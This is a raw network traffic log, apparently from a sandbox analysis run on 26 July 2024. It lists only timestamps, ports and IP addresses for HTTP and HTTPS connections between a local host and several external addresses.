Jul 26, 2024 13:02:47.668222904 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.668236971 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.668273926 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.668380976 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.668395042 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.668409109 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.668425083 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.668441057 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.668639898 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.668654919 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.668668985 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.668678045 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.668692112 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.668700933 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.668715000 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.668750048 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.668873072 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669034004 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669048071 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669061899 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669070959 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.669084072 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669097900 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669111967 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669121027 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.669135094 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669148922 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.669426918 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669440985 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669455051 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669469118 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.669481039 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669528008 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.669624090 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669639111 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669677019 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.669794083 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669821978 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669852018 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669881105 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.669955015 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.669994116 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.670017004 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670046091 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670073986 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670094967 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.670120001 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670149088 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670167923 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.670358896 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670387983 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670406103 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.670433998 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670464039 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670483112 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.670536041 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670625925 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.670675039 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670705080 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670742035 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.670764923 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670792103 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670821905 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670840025 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.670866013 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.670908928 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.671011925 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671040058 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671070099 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671087027 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.671116114 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671214104 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.671236992 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671266079 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671310902 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.671359062 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671387911 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671416044 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671433926 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.671462059 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671506882 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.671632051 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671659946 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671674967 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671691895 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.671717882 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671732903 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671747923 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.671812057 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.671927929 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.672497988 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.672545910 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.672560930 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.672590971 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.672635078 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.672681093 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.672708988 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.672739983 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.672802925 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.765194893 CEST	80	49168	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:47.785521984 CEST	49180	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:47.785572052 CEST	443	49180	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:47.785634995 CEST	49180	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:47.785844088 CEST	49180	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:47.785861969 CEST	443	49180	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:47.961875916 CEST	49168	80	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:48.033899069 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.040174961 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.040282965 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.040354013 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.046199083 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.314459085 CEST	443	49180	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:48.314527035 CEST	49180	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:48.317912102 CEST	49180	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:48.317928076 CEST	443	49180	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:48.318178892 CEST	443	49180	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:48.319030046 CEST	49180	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:48.364495993 CEST	443	49180	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:48.522007942 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.522066116 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.522099972 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.522121906 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.522131920 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.522166967 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.522192001 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.522198915 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.522234917 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.522353888 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.522386074 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.522419930 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.522425890 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.522425890 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.527225018 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.527276039 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.527316093 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.603137016 CEST	443	49180	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:48.603216887 CEST	443	49180	188.114.96.3	192.168.2.22
Jul 26, 2024 13:02:48.603368044 CEST	49180	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:48.603368044 CEST	49180	443	192.168.2.22	188.114.96.3
Jul 26, 2024 13:02:48.609489918 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.609539986 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.609544992 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.609580040 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.609664917 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.609673023 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.609699011 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.609814882 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.610646009 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.610697031 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.610729933 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.610740900 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.610788107 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.610820055 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.610872030 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.610934019 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.610965967 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.610980988 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.610999107 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.611090899 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.611183882 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.611216068 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.611412048 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.611911058 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.611998081 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.612030983 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.612042904 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.612152100 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.612184048 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.612194061 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.614669085 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.614795923 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.614847898 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.626106024 CEST	49182	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:48.626142979 CEST	443	49182	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:48.626202106 CEST	49182	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:48.626446009 CEST	49182	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:48.626455069 CEST	443	49182	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:48.697055101 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.697108984 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.697130919 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.697141886 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.697190046 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.697204113 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.697225094 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.697256088 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.697288990 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.697338104 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.697379112 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.697379112 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.697422981 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.697454929 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.697499037 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.697545052 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.697576046 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.697607994 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.697674990 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.697696924 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.697770119 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.698318005 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.698350906 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.698384047 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.698415995 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.698426008 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.698447943 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.698484898 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.698548079 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.698580027 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.698637962 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.699124098 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.699172974 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.699203968 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.699258089 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.699331045 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.699362040 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.699393988 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.699398994 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.699455023 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.699476004 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.699955940 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.700002909 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.700009108 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.700035095 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.700084925 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.784159899 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.784183025 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.784198999 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.784229994 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.784261942 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.784276962 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.784290075 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.784306049 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.784311056 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.784476995 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.784477949 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.784528017 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.784544945 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.784568071 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.784890890 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.784904957 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.784919024 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.784933090 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.784939051 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.784997940 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.785401106 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.785465956 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.785480976 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.785515070 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.785619020 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.785634041 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.785648108 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.785661936 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.785679102 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.785953999 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.786190033 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.786278963 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.786293983 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.786386013 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.786401033 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.786417961 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.786429882 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.786453962 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.786516905 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.786627054 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.787072897 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.787133932 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.787148952 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.787168026 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.787265062 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.787280083 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.787295103 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.787302971 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.787348986 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.801206112 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.805222988 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.805254936 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.805289030 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.805303097 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.805335045 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.805367947 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.805397034 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.805413008 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.805413008 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.879489899 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.879522085 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.879537106 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.879551888 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.879565954 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.879573107 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.879573107 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.879580975 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.879596949 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.879612923 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.879632950 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.879632950 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.879662037 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.879676104 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.879689932 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.879703999 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.879724026 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.879724026 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.879841089 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.879856110 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.879879951 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.880036116 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880049944 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880072117 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880072117 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.880086899 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880101919 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880115986 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880129099 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880135059 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.880135059 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.880145073 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880302906 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.880503893 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880517960 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880536079 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880549908 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880558014 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.880563974 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880595922 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.880595922 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.880613089 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880626917 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880640984 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880656004 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880669117 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880683899 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880686998 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.880686998 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.880697966 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880716085 CEST	80	49181	104.168.45.34	192.168.2.22
